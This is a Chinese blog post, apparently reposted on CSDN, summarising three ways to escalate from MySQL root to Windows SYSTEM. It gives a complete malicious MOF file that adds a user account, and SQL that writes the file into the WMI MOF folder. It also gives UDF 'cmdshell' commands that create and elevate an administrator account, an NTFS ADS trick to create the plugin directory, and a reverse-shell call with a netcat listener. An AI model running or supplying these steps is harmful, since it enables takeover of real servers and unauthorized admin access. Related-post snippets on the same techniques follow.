mysql mof_mysql的MOF和UDF提权

最新推荐文章于 2022-03-31 23:01:58 发布
最新推荐文章于 2022-03-31 23:01:58 发布
阅读量220 收藏
点赞数
文章标签: mysql mof
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42499899/article/details/113197757
版权

最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。

一、利用mof提权

前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下:

Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:

方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。

方法 2: 使用 IMofCompiler 接口和 $ CompileFile 方法。

方法 3: 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。

Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile 方法。

第三种方法仅为向后兼容性与早期版本的 WMI 提供,并因为此功能可能不会提供在将来的版本后,不应使用。

具体到mysql提权中,我们又该怎么利用呢?

1、找一个可写目录上传mof文件,我这里上传到了 C:/wmpub/nullevt.mof 代码如下。

01

#pragmanamespace("\\\\.\\root\\subscription")

02

03

instance of __EventFilteras $EventFilter

04

{

05

EventNamespace ="Root\\Cimv2";

06

Name  ="filtP2";

07

Query ="Select * From __InstanceModificationEvent "

08

"Where TargetInstance Isa \"Win32_LocalTime\" "

09

"And TargetInstance.Second = 5";

10

QueryLanguage ="WQL";

11

};

12

13

instance of ActiveScriptEventConsumeras $Consumer

14

{

15

Name ="consPCSV2";

16

ScriptingEngine ="JScript";

17

ScriptText =

18

"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")";

19

};

20

21

instance of __FilterToConsumerBinding

22

{

23

Consumer   =$Consumer;

24

Filter =$EventFilter;

25

};

其中的第18行的命令,上传前请自己更改。

2、执行load_file及into dumpfile把文件导出到正确的位置即可。

1

select load_file('C:/wmpub/nullevt.mof')into dumpfile'c:/windows/system32/wbem/mof/nullevt.mof'

执行成功后,即可添加一个普通用户,然后你可以更改命令,再上传导出执行把用户提升到管理员权限,然后3389连接之就ok了。

二、利用UDF提权

udf提权这是最常见的提权方式了,但是往往在执行过程中老是遇到"Can't open shared library"的情况,这里我们可以利用NTFS ADS流来解决这个问题。

1、最常见的是直接使用udf.php此类的工具来执行udf提权,具体如下。

连接到mysql以后,先导出udf.dll到c:\windows\system32目录下。

2、创建相应的函数并执行命令,具体如下:

1

create function cmdshellreturns string soname'udf.dll';

2

select cmdshell('net user waitalone waitalone.cn /add');

3

select cmdshell('net localgroup administrators waitalone /add');

4

drop function cmdshell; 删除函数

5

delete from mysql.funcwhere name='cmdshell'  删除函数

3、某些情况下,我们会遇到Can't open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,但是默认情况下plugin不存在,怎么办? 还好有大牛研究出了利用NTFS ADS流来创建文件夹的方法

1

select @@basedir;

2

//查找到mysql的目录

3

select 'It is dll' into dumpfile'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';

4

//利用NTFS ADS创建lib目录

5

select 'It is dll' into dumpfile'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';

6

//利用NTFS ADS创建plugin目录

执行成功以后再进行导出即可。

三、反弹端口连接提权

假如我们扫到了一个mysql的root弱密码,并且可以外连,但是服务器上面的网站又无法Getshell,这时我们怎么办呢?

1、利用mysql客户端工具连接mysql服务器,然后执行下面的操作。

1

mysql.exe -h 172.16.10.11 -uroot -p

2

Enter password:

3

mysql> \. c:\mysql.txt

4

mysql>select backshell("YourIP",2010);

2、本地监听你反弹的端口

nc.exe -vv -l -p 2010

成功后,你将获得一个system权限的cmdshell,其实这个也是利用的UDF提权。

夏树盛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql--udfmof、启动项
yang1234567898的博客
01-05 1164
1、udf 当获取到mysql的root限,需要进行升,可以尝试使用udf 首先需要查看mysql是否有导入导出功能,如果secure_file_priv为null,则无法使用udf,如果value值为空,则可以继续尝试 show variables like 'secure_file_priv'; secure_file_priv的value为null ,不允许导入导出 secure_file_priv的value为/dir/,只允许dir目录下导入导.
mysqlMOFUDF复现
qq_25768397的博客
08-25 899
今天复现了一下mysql,以往都没有尝试过,所以搭建环境尝试一下。 搭建环境: phpstudy win7企业版 DVWA上传点 以上步骤省略,跳到getshell后,使用哥斯拉进行。(假设所有条件满足,如不满足,尝试其他方法) 一、MOF 原理: 利用c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会有一个特定的时间去执行一次,那么把cmd命令添加到nullevt.mof中,cmd命令就会自动执行了。 注:mysql5.7 开始默认使
[WEB安全]MySQl mofudf过程详解
网络安全知识分享
12-17 3170
MySQL〇、Mysql的必备条件1、Mysql密码查询2、利用ntfs特性创建文件夹3、常用的sql基础查询命令一、mof0、环境搭建1、原理2、条件3、开始4、删号二、UDF0、原理1、步骤2、实操 〇、Mysql的必备条件 Mysql的服务没有降,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降 1、Mysql密码查询 1、root密码查询 # MySQL <= 5.6 版本 selec
UDFMOF
Armandhe的博客
06-05 1061
让我们来康康mysql的两种常见姿势!!!!!!!!!!!!!!!!
mysql udfmof
weixin_45427650的博客
03-13 843
原理 udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。 通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system限。 0x01 思路 将udf文件上传到指定位置 sqlmap中有现成的udf文件,分为32位和64位,一定要选择对版本,否则会显示:Can...
Windows之第三方组件mysql(mof)
mrx56的博客
03-31 3762
为什么要? 答:因为webshell的限一般是继承中间件的限,此时就需要高到系统管理员限才方便进一步渗透。一般java中间件运行限最高。 Windows常用命令 内置组: Administrators(管理员组) Guests (来宾组,限最低,默认禁止) Users(新建用户组) net user 查看所有用户信息 net user + 用户名 查看此用户信息 net user + 用户名 /del 删除此用户 net user + 用户名+密码 /add 添加用户 net loca
Mysql UDFMOF、反链端口.zip
12-14
Mysql UDFMOF、反链端口
mof文件nullevt.mof
03-12
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root限了以后,然后使用root限去执行我们上传的...
MOF_papers:@MOF_papers Twitter机器人的代码和数据
02-12
"MOF_papers:@MOF_papers Twitter机器人的代码和数据" 这个标题表明,这是一个关于创建和维护Twitter机器人的项目,特别关注的是Metal-Organic Frameworks(MOFs)领域的最新研究论文。@MOF_papers 是这个机器人在...
MOF_V2.5.1
07-13
MOF_V2.5.1
MYSQL高版本低版本UDF工具
06-20
MYSQL高版本低版本UDF工具 很好用的UDF使用 有两个版本
Linux利用UDF库实现Mysql
12-15
环境: os:linux(bt5)   database:mysql   简述: 通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。   要求:  在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;   过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令 1,得到插件库路径 mysql> show variables like "%plugin%"; +---------------+-----------------------+ |
DS_project_MOF_H2_ML
04-19
该项目“DS_project_MOF_H2_ML”是加州大学伯克利分校DS 100课程的一个实践项目,主要涉及数据科学与机器学习的应用。在这个项目中,学生可能需要运用数据处理、建模和预测技术来解决实际问题,特别是在材料科学领域...
udfmof
weixin_34235105的博客
05-16 210
1、Selectversion();查看数据库版本小于5.0以下的要导出到c:\windows\或者c:\windows\system32目录下5.1必须要导出到mysql安装目录下的lib\plugin目录下2、select@@basedir();查看UDF.DLL文件路径3、createtableudftext(udfblob);创建临时表4、inse...
渗透测试之udf+mof+启动项
LKmnbZ's Blog
11-07 5639
1. 限给高限去取(你已经获得一定的限) Windows 一般用户 系统用户 管理员 system Linux 普通用户 系统用户 root 2. udf 1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete 限以创建和抛弃函...
mysql数据库反弹端口连接
热门推荐
xiaotu0821的博客
11-12 6万+
Mysql数据库反弹端口连接 在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令,在一般的情况下,也就放弃了,但其实可以换一种思路,通过mysql查询来直接,可以针对以下场景: (1)通过网站无法获取webshell (2)Webshell无法执行命令 (3)有phpmyadmin和root账号,无法查询或者无...
Mysql方法总结系列-UDF
kracer的博客
02-27 2582
0x01 简介 UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。UDF官方介绍以及其函数定义请参考链接。 0x01 当获取到mysql的root限,需要进行升,可以尝试使用udf。 1、条件判断 ① ...
udf
weixin_30576859的博客
03-16 634
0x00前言: udf是通过数据库来实现获取目标的管理员的shell,来达到从低到高限 0x01什么是udfudf(Userdefined function)是用户自定义函数 在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数 udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRIN...
(新安全原创精华)Mysql扩展文件MOF详讲
甲方乙方
08-12 6715
哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了。 希望大家可以支持我们,我们也会做得更好。无论是批评还是鼓励我们一样接受。 【MYSQLMysql扩展文件MOF详讲 【原理】在c:/windows/system32/wbem/mof/目录下的nullevt.mof每分钟都会有一个特定的时间去执行一次(由"And TargetIn
mysql mof原理_mof原理及其过程
最新发布
05-16
Mof的原理是通过创建一个恶意的Mof文件,并将其注册到WMI中,然后利用WMI的执行限来执行Mof文件中的命令,从而实现。具体过程如下: 1. 创建一个恶意的Mof文件,并将其中的类名定义为“__EventFilter”,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值